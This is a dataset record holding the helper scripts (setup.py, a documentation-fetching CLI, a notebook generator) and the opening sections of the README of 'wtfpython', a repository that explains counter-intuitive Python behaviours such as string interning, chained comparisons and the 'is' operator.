repo_name
stringlengths
3
38
repo_commit
stringlengths
40
40
repo_content
stringlengths
0
949k
repo_readme
stringlengths
34
275k
wtfpython
d2673bba08d0ec2d52bb34576e1d55772e4ba0c1
File: mixed_tabs_and_spaces.py def square(x): sum_so_far = 0 for _ in range(x): sum_so_far += x return sum_so_far # noqa: E999 # pylint: disable=mixed-indentation Python 3 will raise a TabError here print(square(10)) File: wtfpython-pypi/setup.py from setuptools import setup, find_packages if __name__ == "__main__": setup(name='wtfpython', version='0.2', description='What the f*ck Python!', author="Satwik Kansal", maintainer="Satwik Kansal", maintainer_email='[email protected]', url='https://github.com/satwikkansal/wtfpython', platforms='any', license="WTFPL 2.0", long_description="An interesting collection of subtle & tricky Python Snippets" " and features.", keywords="wtfpython gotchas snippets tricky", packages=find_packages(), entry_points = { 'console_scripts': ['wtfpython = wtf_python.main:load_and_read'] }, classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Console', 'Environment :: MacOS X', 'Environment :: Win32 (MS Windows)', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: End Users/Desktop', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 2', 'Topic :: Documentation', 'Topic :: Education', 'Topic :: Scientific/Engineering', 'Topic :: Software Development'], ) File: wtfpython-pypi/wtf_python/__init__.py File: wtfpython-pypi/wtf_python/main.py from os.path import dirname, join, realpath import pydoc try: from urllib.request import urlretrieve except ImportError: from urllib import urlretrieve url = ("http://raw.githubusercontent.com/satwikkansal/" "wtfpython/master/README.md") file_path = join(dirname(dirname(realpath(__file__))), "content.md") def fetch_updated_doc(): """ Fetch the latest version of the file at `url` and save it to `file_path`. If anything goes wrong, do nothing. """ try: print("Fetching the latest version...") urlretrieve(url, file_path) print("Done!") except Exception as e: print(e) print("Uh oh, failed to check for the latest version, " "using the local version for now.") def render_doc(): with open(file_path, 'r', encoding="utf-8") as f: content = f.read() pydoc.pager(content) def load_and_read(): fetch_updated_doc() render_doc() if __name__== "__main__": load_and_read() File: irrelevant/insert_ids.py import uuid new_file = [] original_file = [] fname = "../README.md" def generate_random_id_comment(): random_id = uuid.uuid4() return f"<!-- Example ID: {random_id} --!>" with open(fname, "r") as f: original_file = f.readlines() for line in original_file: new_file.append(line) if line.strip().startswith("### "): new_file.append(generate_random_id_comment()) with open(fname, "w") as f: f.write("".join(new_file)) File: irrelevant/notebook_generator.py """ An inefficient monolithic piece of code that'll generate jupyter notebook from the projects main README. PS: If you are a recruiter, please don't judge me by this piece of code. I wrote it in hurry. I know this is messy and can be simplified, but I don't want to change it much because it just works. Simplifictions and improvements through patches are more than welcome however :) #TODOs - CLI arguments for running this thing - Add it to prepush hook - Add support for skip comments, to skip examples that are not meant for notebook environment. - Use templates? """ import json import os import pprint fpath = os.path.join(os.path.dirname( __file__ ), '..', 'README.md') examples = [] # The globals current_example = 1 sequence_num = 1 current_section_name = "" STATEMENT_PREFIXES = ["...", ">>> ", "$ "] HOSTED_NOTEBOOK_INSTRUCTIONS = """ ## Hosted notebook instructions This is just an experimental attempt of browsing wtfpython through jupyter notebooks. Some examples are read-only because, - they either require a version of Python that's not supported in the hosted runtime. - or they can't be reproduced in the notebook envrinonment. The expected outputs are already present in collapsed cells following the code cells. The Google colab provides Python2 (2.7) and Python3 (3.6, default) runtimes. You can switch among these for Python2 specific examples. For examples specific to other minor versions, you can simply refer to collapsed outputs (it's not possible to control the minor version in hosted notebooks as of now). You can check the active version using ```py >>> import sys >>> sys.version # Prints out Python version here. ``` That being said, most of the examples do work as expected. If you face any trouble, feel free to consult the original content on wtfpython and create an issue in the repo. Have fun! --- """ def generate_code_block(statements, output): """ Generates a code block that executes the given statements. :param statements: The list of statements to execute. :type statements: list(str) """ global sequence_num result = { "type": "code", "sequence_num": sequence_num, "statements": statements, "output": output } sequence_num += 1 return result def generate_markdown_block(lines): """ Generates a markdown block from a list of lines. """ global sequence_num result = { "type": "markdown", "sequence_num": sequence_num, "value": lines } sequence_num += 1 return result def is_interactive_statement(line): for prefix in STATEMENT_PREFIXES: if line.lstrip().startswith(prefix): return True return False def parse_example_parts(lines, title, current_line): """ Parse the given lines and return a dictionary with two keys: build_up, which contains all the text before an H4 (explanation) is encountered, and explanation, which contains all the text after build_up until --- or another H3 is encountered. """ parts = { "build_up": [], "explanation": [] } content = [title] statements_so_far = [] output_so_far = [] next_line = current_line # store build_up till an H4 (explanation) is encountered while not (next_line.startswith("#### ")or next_line.startswith('---')): # Watching out for the snippets if next_line.startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False output_encountered = False if content: parts["build_up"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) elif output_encountered: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. content.append(next_line) next_line = next(lines) # Explanation encountered, save any content till now (if any) if content: parts["build_up"].append(generate_markdown_block(content)) # Reset stuff content = [] statements_so_far, output_so_far = [], [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): if next_line.lstrip().startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False if content: parts["explanation"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.lstrip().startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. content.append(next_line) next_line = next(lines) # All done if content: parts["explanation"].append(generate_markdown_block(content)) return next_line, parts def remove_from_beginning(tokens, line): for token in tokens: if line.lstrip().startswith(token): line = line.replace(token, "") return line def inspect_and_sanitize_code_lines(lines): """ Remove lines from the beginning of a code block that are not statements. :param lines: A list of strings, each representing a line in the code block. :returns is_print_present, sanitized_lines: A boolean indicating whether print was present in the original code and a list of strings representing sanitized lines. The latter may be an empty list if all input lines were removed as comments or whitespace (and thus did not contain any statements). This function does not remove blank lines at the end of `lines`. """ tokens_to_remove = STATEMENT_PREFIXES result = [] is_print_present = False for line in lines: line = remove_from_beginning(tokens_to_remove, line) if line.startswith("print ") or line.startswith("print("): is_print_present = True result.append(line) return is_print_present, result def convert_to_cells(cell_contents, read_only): """ Converts a list of dictionaries containing markdown and code cells into a Jupyter notebook. :param cell_contents: A list of dictionaries, each dictionary representing either a markdown or code cell. Each dictionary should have the following keys: "type", which is either "markdown" or "code", and "value". The value for type = 'markdown' is the content as string, whereas the value for type = 'code' is another dictionary with two keys, statements and output. The statements key contains all lines in between ```py\n``` (including) until ```\n```, while output contains all lines after ```.output py\n```. :type cell_contents: List[Dict] :param read_only (optional): If True then only print outputs are included in converted cells. Default False :type read_only (optional): bool :returns A Jupyter notebook containing all cells from input parameter `cell_contents`. Each converted cell has metadata attribute collapsed set to true if it's code-cell otherwise None if it's markdow-cell. """ cells = [] for stuff in cell_contents: if stuff["type"] == "markdown": # todo add metadata later cells.append( { "cell_type": "markdown", "metadata": {}, "source": stuff["value"] } ) elif stuff["type"] == "code": if read_only: # Skip read only # TODO: Fix cells.append( { "cell_type": "markdown", "metadata": {}, "source": ["```py\n"] + stuff["statements"] + ["```\n"] + ["```py\n"] + stuff['output'] + ["```\n"] } ) continue is_print_present, sanitized_code = inspect_and_sanitize_code_lines(stuff["statements"]) if is_print_present: cells.append( { "cell_type": "code", "metadata": { "collapsed": True, }, "execution_count": None, "outputs": [{ "name": "stdout", "output_type": "stream", "text": stuff["output"] }], "source": sanitized_code } ) else: cells.append( { "cell_type": "code", "execution_count": None, "metadata": { "collapsed": True }, "outputs": [{ "data": { "text/plain": stuff["output"] }, "output_type": "execute_result", "metadata": {}, "execution_count": None }], "source": sanitized_code } ) return cells def convert_to_notebook(pre_examples_content, parsed_json, post_examples_content): """ Convert a JSON file containing the examples to a Jupyter Notebook. """ result = { "cells": [], "metadata": {}, "nbformat": 4, "nbformat_minor": 2 } notebook_path = "wtf.ipynb" result["cells"] += convert_to_cells([generate_markdown_block(pre_examples_content)], False) for example in parsed_json: parts = example["parts"] build_up = parts.get("build_up") explanation = parts.get("explanation") read_only = example.get("read_only") if build_up: result["cells"] += convert_to_cells(build_up, read_only) if explanation: result["cells"] += convert_to_cells(explanation, read_only) result["cells"] += convert_to_cells([generate_markdown_block(post_examples_content)], False) #pprint.pprint(result, indent=2) with open(notebook_path, "w") as f: json.dump(result, f, indent=2) with open(fpath, 'r+', encoding="utf-8") as f: lines = iter(f.readlines()) line = next(lines) result = [] pre_examples_phase = True pre_stuff = [] post_stuff = [] try: while True: if line.startswith("## "): pre_examples_phase = False # A section is encountered current_section_name = line.replace("## ", "").strip() section_text = [] line = next(lines) # Until a new section is encountered while not (line.startswith("## ") or line.startswith("# ")): # check if it's a H3 if line.startswith("### "): # An example is encountered title_line = line line = next(lines) read_only = False while line.strip() == "" or line.startswith('<!--'): #TODO: Capture example ID here using regex. if '<!-- read-only -->' in line: read_only = True line = next(lines) example_details = { "id": current_example, "title": title_line.replace("### ", ""), "section": current_section_name, "read_only": read_only } line, example_details["parts"] = parse_example_parts(lines, title_line, line) result.append(example_details) current_example += 1 else: section_text.append(line) line = next(lines) else: if pre_examples_phase: pre_stuff.append(line) else: post_stuff.append(line) line = next(lines) except StopIteration as e: #pprint.pprint(result, indent=2) pre_stuff.append(HOSTED_NOTEBOOK_INSTRUCTIONS) result.sort(key = lambda x: x["read_only"]) convert_to_notebook(pre_stuff, result, post_stuff) File: irrelevant/obsolete/generate_contributions.py """ This script parses the README.md and generates the table `CONTRIBUTORS.md`. No longer works since we've moved on contributors to CONTRIBUTORS.md entirely. """ import pprint import re import requests regex = ("[sS]uggested by @(\S+) in \[this\]\(https:\/\/github\.com\/satwikkansal" "\/wtf[pP]ython\/issues\/(\d+)\) issue") fname = "README.md" contribs = {} table_header = """ | Contributor | Github | Issues | |-------------|--------|--------| """ table_row = '| {} | [{}](https://github.com/{}) | {} |' issue_format = '[#{}](https:/github.com/satwikkansal/wtfpython/issues/{})' rows_so_far = [] github_rest_api = "https://api.github.com/users/{}" with open(fname, 'r') as f: file_content = f.read() matches = re.findall(regex, file_content) for match in matches: if contribs.get(match[0]) and match[1] not in contribs[match[0]]: contribs[match[0]].append(match[1]) else: contribs[match[0]] = [match[1]] for handle, issues in contribs.items(): issue_string = ', '.join([issue_format.format(i, i) for i in issues]) resp = requests.get(github_rest_api.format(handle)) name = handle if resp.status_code == 200: pprint.pprint(resp.json()['name']) else: print(handle, resp.content) rows_so_far.append(table_row.format(name, handle, handle, issue_string)) print(table_header + "\n".join(rows_so_far)) File: irrelevant/obsolete/parse_readme.py # -*- coding: utf-8 -*- """ This inefficient module would parse the README.md in the initial version of WTFPython, and enable me to categorize and reorder a hell lot of examples with the help of the file `add_categories` (part of which is automatically generated). After the refactor, this module would not work now with necessary updates in the code. """ try: raw_input # Python 2 except NameError: raw_input = input # Python 3 fname = "README.md" snippets = [] with open(fname, 'r') as f: lines = iter(f.readlines()) line = lines.next() try: while True: # check if it's a H3 if line.startswith("### "): title = line.replace("### ", "") description = [] next_line = lines.next() # store lines till an H4 (explanation) is encountered while not next_line.startswith("#### "): description.append(next_line) next_line = lines.next() explanation = [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): explanation.append(next_line) next_line = lines.next() # Store the results finally snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) line = next_line else: line = lines.next() except StopIteration: snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) ''' # Create a file file_content = "\n\n".join([snip["title"] for snip in snippets]) with open("add_categories", "w") as f: f.write(file_content) ''' snips_by_title = {} with open("add_categories", "r") as f: content = iter(f.readlines()) try: while True: title = content.next() cat = content.next().strip() is_new = True if cat[-1]=="*" else False cat = cat.replace('*','') snips_by_title[title] = { "category": cat, "is_new": is_new } content.next() except StopIteration: pass for idx, snip in enumerate(snippets): snippets[idx]["category"] = snips_by_title[snip["title"]]["category"] snippets[idx]["is_new"] = snips_by_title[snip["title"]]["is_new"] snips_by_cat = {} for snip in snippets: cat = snip["category"] if not snips_by_cat.get(cat): snips_by_cat[cat] = [] snips_by_cat[cat].append(snip) snippet_template = """ ### ▶ {title}{is_new} {description} {explanation} --- """ category_template = """ --- ## {category} {content} """ result = "" category_names = { "a": "Appearances are Deceptive!", "t": "The Hiddent treasures", "f": "Strain your Brain", "c": "Be careful of these", "m": "Miscallaneous" } categories_in_order = ["a", "t", "f", "c", "m"] for category in categories_in_order: snips = snips_by_cat[category] for i, snip in enumerate(snips): print(i, ":", snip["title"]) content = "" for _ in snips: snip = snips[int(raw_input())] is_new = " *" if snip["is_new"] else "" content += snippet_template.format(title=snip["title"].strip(), is_new=is_new, description=snip["description"].strip().replace("\n\n", "\n"), explanation=snip["explanation"].strip().replace("\n\n", "\n")) result += category_template.format(category=category_names[category], content=content.replace("\n\n\n", "\n\n")) with open("generated.md", "w") as f: f.write(result.replace("\n\n\n", "\n\n")) print("Done!")
<p align="center"><img src="/images/logo.png#gh-light-mode-only" alt=""><img src="/images/logo-dark.png#gh-dark-mode-only" alt=""></p> <h1 align="center">What the f*ck Python! 😱</h1> <p align="center">Exploring and understanding Python through surprising snippets.</p> Translations: [Chinese 中文](https://github.com/leisurelicht/wtfpython-cn) | [Vietnamese Tiếng Việt](https://github.com/vuduclyunitn/wtfptyhon-vi) | [Spanish Español](https://web.archive.org/web/20220511161045/https://github.com/JoseDeFreitas/wtfpython-es) | [Korean 한국어](https://github.com/buttercrab/wtfpython-ko) | [Russian Русский](https://github.com/satwikkansal/wtfpython/tree/master/translations/ru-russian) | [German Deutsch](https://github.com/BenSt099/wtfpython) | [Add translation](https://github.com/satwikkansal/wtfpython/issues/new?title=Add%20translation%20for%20[LANGUAGE]&body=Expected%20time%20to%20finish:%20[X]%20weeks.%20I%27ll%20start%20working%20on%20it%20from%20[Y].) Other modes: [Interactive Website](https://wtfpython-interactive.vercel.app) | [Interactive Notebook](https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb) | [CLI](https://pypi.python.org/pypi/wtfpython) Python, being a beautifully designed high-level and interpreter-based programming language, provides us with many features for the programmer's comfort. But sometimes, the outcomes of a Python snippet may not seem obvious at first sight. Here's a fun project attempting to explain what exactly is happening under the hood for some counter-intuitive snippets and lesser-known features in Python. While some of the examples you see below may not be WTFs in the truest sense, but they'll reveal some of the interesting parts of Python that you might be unaware of. I find it a nice way to learn the internals of a programming language, and I believe that you'll find it interesting too! If you're an experienced Python programmer, you can take it as a challenge to get most of them right in the first attempt. You may have already experienced some of them before, and I might be able to revive sweet old memories of yours! :sweat_smile: PS: If you're a returning reader, you can learn about the new modifications [here](https://github.com/satwikkansal/wtfpython/releases/) (the examples marked with asterisk are the ones added in the latest major revision). So, here we go... # Table of Contents <!-- Generated using "markdown-toc -i README.md --maxdepth 3"--> <!-- toc --> - [Structure of the Examples](#structure-of-the-examples) + [▶ Some fancy Title](#-some-fancy-title) - [Usage](#usage) - [👀 Examples](#-examples) * [Section: Strain your brain!](#section-strain-your-brain) + [▶ First things first! *](#-first-things-first-) + [▶ Strings can be tricky sometimes](#-strings-can-be-tricky-sometimes) + [▶ Be careful with chained operations](#-be-careful-with-chained-operations) + [▶ How not to use `is` operator](#-how-not-to-use-is-operator) + [▶ Hash brownies](#-hash-brownies) + [▶ Deep down, we're all the same.](#-deep-down-were-all-the-same) + [▶ Disorder within order *](#-disorder-within-order-) + [▶ Keep trying... *](#-keep-trying-) + [▶ For what?](#-for-what) + [▶ Evaluation time discrepancy](#-evaluation-time-discrepancy) + [▶ `is not ...` is not `is (not ...)`](#-is-not--is-not-is-not-) + [▶ A tic-tac-toe where X wins in the first attempt!](#-a-tic-tac-toe-where-x-wins-in-the-first-attempt) + [▶ Schrödinger's variable](#-schrödingers-variable-) + [▶ The chicken-egg problem *](#-the-chicken-egg-problem-) + [▶ Subclass relationships](#-subclass-relationships) + [▶ Methods equality and identity](#-methods-equality-and-identity) + [▶ All-true-ation *](#-all-true-ation-) + [▶ The surprising comma](#-the-surprising-comma) + [▶ Strings and the backslashes](#-strings-and-the-backslashes) + [▶ not knot!](#-not-knot) + [▶ Half triple-quoted strings](#-half-triple-quoted-strings) + [▶ What's wrong with booleans?](#-whats-wrong-with-booleans) + [▶ Class attributes and instance attributes](#-class-attributes-and-instance-attributes) + [▶ yielding None](#-yielding-none) + [▶ Yielding from... return! *](#-yielding-from-return-) + [▶ Nan-reflexivity *](#-nan-reflexivity-) + [▶ Mutating the immutable!](#-mutating-the-immutable) + [▶ The disappearing variable from outer scope](#-the-disappearing-variable-from-outer-scope) + [▶ The mysterious key type conversion](#-the-mysterious-key-type-conversion) + [▶ Let's see if you can guess this?](#-lets-see-if-you-can-guess-this) + [▶ Exceeds the limit for integer string conversion](#-exceeds-the-limit-for-integer-string-conversion) * [Section: Slippery Slopes](#section-slippery-slopes) + [▶ Modifying a dictionary while iterating over it](#-modifying-a-dictionary-while-iterating-over-it) + [▶ Stubborn `del` operation](#-stubborn-del-operation) + [▶ The out of scope variable](#-the-out-of-scope-variable) + [▶ Deleting a list item while iterating](#-deleting-a-list-item-while-iterating) + [▶ Lossy zip of iterators *](#-lossy-zip-of-iterators-) + [▶ Loop variables leaking out!](#-loop-variables-leaking-out) + [▶ Beware of default mutable arguments!](#-beware-of-default-mutable-arguments) + [▶ Catching the Exceptions](#-catching-the-exceptions) + [▶ Same operands, different story!](#-same-operands-different-story) + [▶ Name resolution ignoring class scope](#-name-resolution-ignoring-class-scope) + [▶ Rounding like a banker *](#-rounding-like-a-banker-) + [▶ Needles in a Haystack *](#-needles-in-a-haystack-) + [▶ Splitsies *](#-splitsies-) + [▶ Wild imports *](#-wild-imports-) + [▶ All sorted? *](#-all-sorted-) + [▶ Midnight time doesn't exist?](#-midnight-time-doesnt-exist) * [Section: The Hidden treasures!](#section-the-hidden-treasures) + [▶ Okay Python, Can you make me fly?](#-okay-python-can-you-make-me-fly) + [▶ `goto`, but why?](#-goto-but-why) + [▶ Brace yourself!](#-brace-yourself) + [▶ Let's meet Friendly Language Uncle For Life](#-lets-meet-friendly-language-uncle-for-life) + [▶ Even Python understands that love is complicated](#-even-python-understands-that-love-is-complicated) + [▶ Yes, it exists!](#-yes-it-exists) + [▶ Ellipsis *](#-ellipsis-) + [▶ Inpinity](#-inpinity) + [▶ Let's mangle](#-lets-mangle) * [Section: Appearances are deceptive!](#section-appearances-are-deceptive) + [▶ Skipping lines?](#-skipping-lines) + [▶ Teleportation](#-teleportation) + [▶ Well, something is fishy...](#-well-something-is-fishy) * [Section: Miscellaneous](#section-miscellaneous) + [▶ `+=` is faster](#--is-faster) + [▶ Let's make a giant string!](#-lets-make-a-giant-string) + [▶ Slowing down `dict` lookups *](#-slowing-down-dict-lookups-) + [▶ Bloating instance `dict`s *](#-bloating-instance-dicts-) + [▶ Minor Ones *](#-minor-ones-) - [Contributing](#contributing) - [Acknowledgements](#acknowledgements) - [🎓 License](#-license) * [Surprise your friends as well!](#surprise-your-friends-as-well) * [More content like this?](#more-content-like-this) <!-- tocstop --> # Structure of the Examples All the examples are structured like below: > ### ▶ Some fancy Title > > ```py > # Set up the code. > # Preparation for the magic... > ``` > > **Output (Python version(s)):** > > ```py > >>> triggering_statement > Some unexpected output > ``` > (Optional): One line describing the unexpected output. > > > #### 💡 Explanation: > > * Brief explanation of what's happening and why is it happening. > ```py > # Set up code > # More examples for further clarification (if necessary) > ``` > **Output (Python version(s)):** > > ```py > >>> trigger # some example that makes it easy to unveil the magic > # some justified output > ``` **Note:** All the examples are tested on Python 3.5.2 interactive interpreter, and they should work for all the Python versions unless explicitly specified before the output. # Usage A nice way to get the most out of these examples, in my opinion, is to read them in sequential order, and for every example: - Carefully read the initial code for setting up the example. If you're an experienced Python programmer, you'll successfully anticipate what's going to happen next most of the time. - Read the output snippets and, + Check if the outputs are the same as you'd expect. + Make sure if you know the exact reason behind the output being the way it is. - If the answer is no (which is perfectly okay), take a deep breath, and read the explanation (and if you still don't understand, shout out! and create an issue [here](https://github.com/satwikkansal/wtfpython/issues/new)). - If yes, give a gentle pat on your back, and you may skip to the next example. PS: You can also read WTFPython at the command line using the [pypi package](https://pypi.python.org/pypi/wtfpython), ```sh $ pip install wtfpython -U $ wtfpython ``` --- # 👀 Examples ## Section: Strain your brain! ### ▶ First things first! * <!-- Example ID: d3d73936-3cf1-4632-b5ab-817981338863 --> <!-- read-only --> For some reason, the Python 3.8's "Walrus" operator (`:=`) has become quite popular. Let's check it out, 1\. ```py # Python version 3.8+ >>> a = "wtf_walrus" >>> a 'wtf_walrus' >>> a := "wtf_walrus" File "<stdin>", line 1 a := "wtf_walrus" ^ SyntaxError: invalid syntax >>> (a := "wtf_walrus") # This works though 'wtf_walrus' >>> a 'wtf_walrus' ``` 2 \. ```py # Python version 3.8+ >>> a = 6, 9 >>> a (6, 9) >>> (a := 6, 9) (6, 9) >>> a 6 >>> a, b = 6, 9 # Typical unpacking >>> a, b (6, 9) >>> (a, b = 16, 19) # Oops File "<stdin>", line 1 (a, b = 16, 19) ^ SyntaxError: invalid syntax >>> (a, b := 16, 19) # This prints out a weird 3-tuple (6, 16, 19) >>> a # a is still unchanged? 6 >>> b 16 ``` #### 💡 Explanation **Quick walrus operator refresher** The Walrus operator (`:=`) was introduced in Python 3.8, it can be useful in situations where you'd want to assign values to variables within an expression. ```py def some_func(): # Assume some expensive computation here # time.sleep(1000) return 5 # So instead of, if some_func(): print(some_func()) # Which is bad practice since computation is happening twice # or a = some_func() if a: print(a) # Now you can concisely write if a := some_func(): print(a) ``` **Output (> 3.8):** ```py 5 5 5 ``` This saved one line of code, and implicitly prevented invoking `some_func` twice. - Unparenthesized "assignment expression" (use of walrus operator), is restricted at the top level, hence the `SyntaxError` in the `a := "wtf_walrus"` statement of the first snippet. Parenthesizing it worked as expected and assigned `a`. - As usual, parenthesizing of an expression containing `=` operator is not allowed. Hence the syntax error in `(a, b = 6, 9)`. - The syntax of the Walrus operator is of the form `NAME:= expr`, where `NAME` is a valid identifier, and `expr` is a valid expression. Hence, iterable packing and unpacking are not supported which means, - `(a := 6, 9)` is equivalent to `((a := 6), 9)` and ultimately `(a, 9) ` (where `a`'s value is 6') ```py >>> (a := 6, 9) == ((a := 6), 9) True >>> x = (a := 696, 9) >>> x (696, 9) >>> x[0] is a # Both reference same memory location True ``` - Similarly, `(a, b := 16, 19)` is equivalent to `(a, (b := 16), 19)` which is nothing but a 3-tuple. --- ### ▶ Strings can be tricky sometimes <!-- Example ID: 30f1d3fc-e267-4b30-84ef-4d9e7091ac1a ---> 1\. ```py >>> a = "some_string" >>> id(a) 140420665652016 >>> id("some" + "_" + "string") # Notice that both the ids are same. 140420665652016 ``` 2\. ```py >>> a = "wtf" >>> b = "wtf" >>> a is b True >>> a = "wtf!" >>> b = "wtf!" >>> a is b False ``` 3\. ```py >>> a, b = "wtf!", "wtf!" >>> a is b # All versions except 3.7.x True >>> a = "wtf!"; b = "wtf!" >>> a is b # This will print True or False depending on where you're invoking it (python shell / ipython / as a script) False ``` ```py # This time in file some_file.py a = "wtf!" b = "wtf!" print(a is b) # prints True when the module is invoked! ``` 4\. **Output (< Python3.7 )** ```py >>> 'a' * 20 is 'aaaaaaaaaaaaaaaaaaaa' True >>> 'a' * 21 is 'aaaaaaaaaaaaaaaaaaaaa' False ``` Makes sense, right? #### 💡 Explanation: + The behavior in first and second snippets is due to a CPython optimization (called string interning) that tries to use existing immutable objects in some cases rather than creating a new object every time. + After being "interned," many variables may reference the same string object in memory (saving memory thereby). + In the snippets above, strings are implicitly interned. The decision of when to implicitly intern a string is implementation-dependent. There are some rules that can be used to guess if a string will be interned or not: * All length 0 and length 1 strings are interned. * Strings are interned at compile time (`'wtf'` will be interned but `''.join(['w', 't', 'f'])` will not be interned) * Strings that are not composed of ASCII letters, digits or underscores, are not interned. This explains why `'wtf!'` was not interned due to `!`. CPython implementation of this rule can be found [here](https://github.com/python/cpython/blob/3.6/Objects/codeobject.c#L19) ![image](/images/string-intern/string_intern.png) + When `a` and `b` are set to `"wtf!"` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `"wtf!"` as an object (because `"wtf!"` is not implicitly interned as per the facts mentioned above). It's a compile-time optimization. This optimization doesn't apply to 3.7.x versions of CPython (check this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for more discussion). + A compile unit in an interactive environment like IPython consists of a single statement, whereas it consists of the entire module in case of modules. `a, b = "wtf!", "wtf!"` is single statement, whereas `a = "wtf!"; b = "wtf!"` are two statements in a single line. This explains why the identities are different in `a = "wtf!"; b = "wtf!"`, and also explain why they are same when invoked in `some_file.py` + The abrupt change in the output of the fourth snippet is due to a [peephole optimization](https://en.wikipedia.org/wiki/Peephole_optimization) technique known as Constant folding. This means the expression `'a'*20` is replaced by `'aaaaaaaaaaaaaaaaaaaa'` during compilation to save a few clock cycles during runtime. Constant folding only occurs for strings having a length of less than 21. (Why? Imagine the size of `.pyc` file generated as a result of the expression `'a'*10**10`). [Here's](https://github.com/python/cpython/blob/3.6/Python/peephole.c#L288) the implementation source for the same. + Note: In Python 3.7, Constant folding was moved out from peephole optimizer to the new AST optimizer with some change in logic as well, so the fourth snippet doesn't work for Python 3.7. You can read more about the change [here](https://bugs.python.org/issue11549). --- ### ▶ Be careful with chained operations <!-- Example ID: 07974979-9c86-4720-80bd-467aa19470d9 ---> ```py >>> (False == False) in [False] # makes sense False >>> False == (False in [False]) # makes sense False >>> False == False in [False] # now what? True >>> True is False == False False >>> False is False is False True >>> 1 > 0 < 1 True >>> (1 > 0) < 1 False >>> 1 > (0 < 1) False ``` #### 💡 Explanation: As per https://docs.python.org/3/reference/expressions.html#comparisons > Formally, if a, b, c, ..., y, z are expressions and op1, op2, ..., opN are comparison operators, then a op1 b op2 c ... y opN z is equivalent to a op1 b and b op2 c and ... y opN z, except that each expression is evaluated at most once. While such behavior might seem silly to you in the above examples, it's fantastic with stuff like `a == b == c` and `0 <= x <= 100`. * `False is False is False` is equivalent to `(False is False) and (False is False)` * `True is False == False` is equivalent to `(True is False) and (False == False)` and since the first part of the statement (`True is False`) evaluates to `False`, the overall expression evaluates to `False`. * `1 > 0 < 1` is equivalent to `(1 > 0) and (0 < 1)` which evaluates to `True`. * The expression `(1 > 0) < 1` is equivalent to `True < 1` and ```py >>> int(True) 1 >>> True + 1 #not relevant for this example, but just for fun 2 ``` So, `1 < 1` evaluates to `False` --- ### ▶ How not to use `is` operator <!-- Example ID: 230fa2ac-ab36-4ad1-b675-5f5a1c1a6217 ---> The following is a very famous example present all over the internet. 1\. ```py >>> a = 256 >>> b = 256 >>> a is b True >>> a = 257 >>> b = 257 >>> a is b False ``` 2\. ```py >>> a = [] >>> b = [] >>> a is b False >>> a = tuple() >>> b = tuple() >>> a is b True ``` 3\. **Output** ```py >>> a, b = 257, 257 >>> a is b True ``` **Output (Python 3.7.x specifically)** ```py >>> a, b = 257, 257 >>> a is b False ``` #### 💡 Explanation: **The difference between `is` and `==`** * `is` operator checks if both the operands refer to the same object (i.e., it checks if the identity of the operands matches or not). * `==` operator compares the values of both the operands and checks if they are the same. * So `is` is for reference equality and `==` is for value equality. An example to clear things up, ```py >>> class A: pass >>> A() is A() # These are two empty objects at two different memory locations. False ``` **`256` is an existing object but `257` isn't** When you start up python the numbers from `-5` to `256` will be allocated. These numbers are used a lot, so it makes sense just to have them ready. Quoting from https://docs.python.org/3/c-api/long.html > The current implementation keeps an array of integer objects for all integers between -5 and 256, when you create an int in that range you just get back a reference to the existing object. So it should be possible to change the value of 1. I suspect the behavior of Python, in this case, is undefined. :-) ```py >>> id(256) 10922528 >>> a = 256 >>> b = 256 >>> id(a) 10922528 >>> id(b) 10922528 >>> id(257) 140084850247312 >>> x = 257 >>> y = 257 >>> id(x) 140084850247440 >>> id(y) 140084850247344 ``` Here the interpreter isn't smart enough while executing `y = 257` to recognize that we've already created an integer of the value `257,` and so it goes on to create another object in the memory. Similar optimization applies to other **immutable** objects like empty tuples as well. Since lists are mutable, that's why `[] is []` will return `False` and `() is ()` will return `True`. This explains our second snippet. Let's move on to the third one, **Both `a` and `b` refer to the same object when initialized with same value in the same line.** **Output** ```py >>> a, b = 257, 257 >>> id(a) 140640774013296 >>> id(b) 140640774013296 >>> a = 257 >>> b = 257 >>> id(a) 140640774013392 >>> id(b) 140640774013488 ``` * When a and b are set to `257` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `257` as an object. * It's a compiler optimization and specifically applies to the interactive environment. When you enter two lines in a live interpreter, they're compiled separately, therefore optimized separately. If you were to try this example in a `.py` file, you would not see the same behavior, because the file is compiled all at once. This optimization is not limited to integers, it works for other immutable data types like strings (check the "Strings are tricky example") and floats as well, ```py >>> a, b = 257.0, 257.0 >>> a is b True ``` * Why didn't this work for Python 3.7? The abstract reason is because such compiler optimizations are implementation specific (i.e. may change with version, OS, etc). I'm still figuring out what exact implementation change cause the issue, you can check out this 